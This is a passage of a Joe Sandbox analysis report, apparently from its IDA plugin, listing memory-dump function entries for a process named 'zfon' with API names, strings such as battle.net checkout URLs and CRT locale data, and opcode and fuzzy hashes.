                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1539549574-3743323925
                                                                                                • Opcode ID: 29a469ce97e9e63c9afcb1297cf3119d81ee8217b80f69d292bc9982e8b506e4
                                                                                                • Instruction ID: 78c883a46133b3683f84ee6de1d9038153cb75860549176344bcac5842e62229
                                                                                                • Opcode Fuzzy Hash: 29a469ce97e9e63c9afcb1297cf3119d81ee8217b80f69d292bc9982e8b506e4
                                                                                                • Instruction Fuzzy Hash: BD212722A08B8282EB10DF29E45426973B0FB88BD4F444274DB8E43A66EF3CE585C740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: memmove$freemallocmemcpy
                                                                                                • String ID: https://www.battle.net/shop/simplecheckout/debug-harness$https://www.battle.net/shop/simplecheckout/error$https://www.battle.net/shop/simplecheckout/loading$https://www.battle.net/shop/simplecheckout/navbar
                                                                                                • API String ID: 343939323-4034954138
                                                                                                • Opcode ID: 763b38a5e1ba8311d891531e55b4489e58e1bc519419c3cf1bddc3e57f5fc990
                                                                                                • Instruction ID: 2510ebb56a4e04fc1ecdcd6eacf9e2697c663b16e4ddbbdf1632304ded0b8dc8
                                                                                                • Opcode Fuzzy Hash: 763b38a5e1ba8311d891531e55b4489e58e1bc519419c3cf1bddc3e57f5fc990
                                                                                                • Instruction Fuzzy Hash: E9020B32915F81D5D705DF24E9802A8B7B4FB48B58F948236CB9C17369EF39E1A5C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1501936508-0
                                                                                                • Opcode ID: 77d40a3a750292ef56bb7ba82bc0b9b507dfb24b3446034ca75943c21c5ab11f
                                                                                                • Instruction ID: 2bcc333089077b3c5d1ee774baa394e26de48f32f5c82043c177ef2822a7074d
                                                                                                • Opcode Fuzzy Hash: 77d40a3a750292ef56bb7ba82bc0b9b507dfb24b3446034ca75943c21c5ab11f
                                                                                                • Instruction Fuzzy Hash: 5A518C62B0BA8291FE6A9B9D9464639B3A4AF54FD4B094435CF4E06FD5DF2CF442C310
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1501936508-0
                                                                                                • Opcode ID: f0706fa7c64a0a7492f233c4046144e15a2d0b25a5c3bc49f148db7cf339c299
                                                                                                • Instruction ID: 4cc35fd8fb4c413f5979b89f25cc66f93a3c3a01a8cbdb50752341717d083576
                                                                                                • Opcode Fuzzy Hash: f0706fa7c64a0a7492f233c4046144e15a2d0b25a5c3bc49f148db7cf339c299
                                                                                                • Instruction Fuzzy Hash: FA517222A0B79291FE659B9DA4A46387394AF54FD4F094439DF4E06B95DF3CF441C310
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentThread$Xtime_diff_to_millis2xtime_get
                                                                                                • String ID:
                                                                                                • API String ID: 3218647749-0
                                                                                                • Opcode ID: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                • Instruction ID: 9a6242b8a0aa872aa357afe41220b86a7cbddce50b873fe452de3b66d6fec96a
                                                                                                • Opcode Fuzzy Hash: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                • Instruction Fuzzy Hash: 45410D32D08686D6EE649F1EE49077973B0EB447C4F508031DB5E426A1DF3DE98AD701
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                • Instruction ID: eada031b1c74ac757cbd0e1234499a6ef508f79975fcca7f2da93a4351c4f1f5
                                                                                                • Opcode Fuzzy Hash: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                • Instruction Fuzzy Hash: 45F00712A1C68990E7D4FF30CC521F95720AF68B44FC40931E62D450EB9F14D956C3B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                • Instruction ID: 332da5c3fc48b521f5ada3fd4bc226fb4bd269ba3e1193b3f3fa749e3233fc27
                                                                                                • Opcode Fuzzy Hash: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                • Instruction Fuzzy Hash: 6CE18032A19B8189EB50DF24E8803EDB7B4FB48788F444535DA8D07BA9DF38E554CB60
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID: document.body.scrollLeft = $document.body.scrollTop =
                                                                                                • API String ID: 3041573648-1848242717
                                                                                                • Opcode ID: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                • Instruction ID: b21d7dd2a1e357c35ce4a31ec169d37b99db0d33232537822fd00b4a9eda8a9c
                                                                                                • Opcode Fuzzy Hash: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                • Instruction Fuzzy Hash: 4471B432A09B8685EB50EF25D8503AEA771FB85B88F841131EA6D07AEDDF3CD445C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B911291B
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9112953
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9112A66
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                  • Part of subcall function 00007FF8B910FD2C: _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FD76
                                                                                                  • Part of subcall function 00007FF8B910FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FD93
                                                                                                  • Part of subcall function 00007FF8B910FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FDC9
                                                                                                  • Part of subcall function 00007FF8B910FD2C: _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FDF4
                                                                                                  • Part of subcall function 00007FF8B910FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE11
                                                                                                  • Part of subcall function 00007FF8B910FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE3A
                                                                                                  • Part of subcall function 00007FF8B910FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE72
                                                                                                  • Part of subcall function 00007FF8B910F930: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B910F93B
                                                                                                  • Part of subcall function 00007FF8B910F930: __crtGetLocaleInfoEx.LIBCPMT ref: 00007FF8B910F955
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: calloc$___lc_locale_name_funcfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsInfoLocaleThrow___lc_codepage_func___mb_cur_max_func__crt__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                • API String ID: 3654265320-3573081731
                                                                                                • Opcode ID: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                • Instruction ID: c38cbe8f1527e4da1af9d1aefffa7a68da06347755ae3902fcc26a8f3ae17fa3
                                                                                                • Opcode Fuzzy Hash: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                • Instruction Fuzzy Hash: 5C51CE32A08BE596E724CF28945046E7BA0FB45BE4B144635CFA9437A4EB3DE482D700
                                                                                                APIs
                                                                                                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7F96EBF9C
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7F96EBFE7
                                                                                                • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7F96EC00D
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7F96EC02E
                                                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7F96EC07B
                                                                                                • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7F96EC082
                                                                                                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7F96EC08F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                • String ID:
                                                                                                • API String ID: 1492985063-0
                                                                                                • Opcode ID: 583b6c5399d8927dd0e9d876002cb2be730c77e550f060ad08d45f6894265d7a
                                                                                                • Instruction ID: 8b0fc48703e3ed6be15d7216c2eaef47133342757639f008aab53c87e68dc01e
                                                                                                • Opcode Fuzzy Hash: 583b6c5399d8927dd0e9d876002cb2be730c77e550f060ad08d45f6894265d7a
                                                                                                • Instruction Fuzzy Hash: 9D515822A0864181EB60AF1AE994238E771FB84FE5F54C231CE6E436E4CF3FD8468755
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: {for
                                                                                                • API String ID: 2943138195-864106941
                                                                                                • Opcode ID: 843ce90981090cc763d5b819b1a82c1911c4347c90cb61675e3ef59b1b7081ca
                                                                                                • Instruction ID: f02c59968a2779d788eaf411900ae92ce858e41001763b273bfdeb92ba80f601
                                                                                                • Opcode Fuzzy Hash: 843ce90981090cc763d5b819b1a82c1911c4347c90cb61675e3ef59b1b7081ca
                                                                                                • Instruction Fuzzy Hash: DC512772A08A85ADF7019FA8D4603E877A1FB44788F848032EB4D4BB99DF7CE655C340
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2418
                                                                                                • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2426
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2438
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F246C
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2476
                                                                                                • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2484
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2494
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$memset$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 700262077-0
                                                                                                • Opcode ID: ab1676f4613d5929e73ddd5a5e1497729e0513e29030f9efa34d5d2f2fe8c048
                                                                                                • Instruction ID: f10bf4a2ab04adac49f36630ede59b4eed1cb6fe0fbf90970d39f9ece3d57fc9
                                                                                                • Opcode Fuzzy Hash: ab1676f4613d5929e73ddd5a5e1497729e0513e29030f9efa34d5d2f2fe8c048
                                                                                                • Instruction Fuzzy Hash: 5241CF62708A8191EE04EF1AE5442AE7356FB44BE0F544631EB6D0BBD9DFBCE146C304
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::atol
                                                                                                • String ID: `template-parameter$void
                                                                                                • API String ID: 2130343216-4057429177
                                                                                                • Opcode ID: 37dc88686286ae883caf861cfcc370a32d0b887e3358d6a576a3fa5485c4a12c
                                                                                                • Instruction ID: 35896fabf8f9aea46463763665a8f8aeb997f322552d61ee3e59f7cb2f000c73
                                                                                                • Opcode Fuzzy Hash: 37dc88686286ae883caf861cfcc370a32d0b887e3358d6a576a3fa5485c4a12c
                                                                                                • Instruction Fuzzy Hash: EF412422B08B56A8FB009BE8D8612AC73B1BF58BC8F981135DF0D26A59DF7CE545C340
                                                                                                APIs
                                                                                                • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E4191
                                                                                                • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E41B8
                                                                                                • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E41FD
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E425B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 3790025958-4289949731
                                                                                                • Opcode ID: a433279aa140c95842c378e63d78108e93d20c681d0bed4b7112ca1e36f64c80
                                                                                                • Instruction ID: eceb51740616e14253b67f79263065c3838654f52aa6c91186754fb60cc6489c
                                                                                                • Opcode Fuzzy Hash: a433279aa140c95842c378e63d78108e93d20c681d0bed4b7112ca1e36f64c80
                                                                                                • Instruction Fuzzy Hash: 70318031A18B0281EB14FF25E988079B272FB94BD4B904531CA2D476ECDF3EE46183E5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
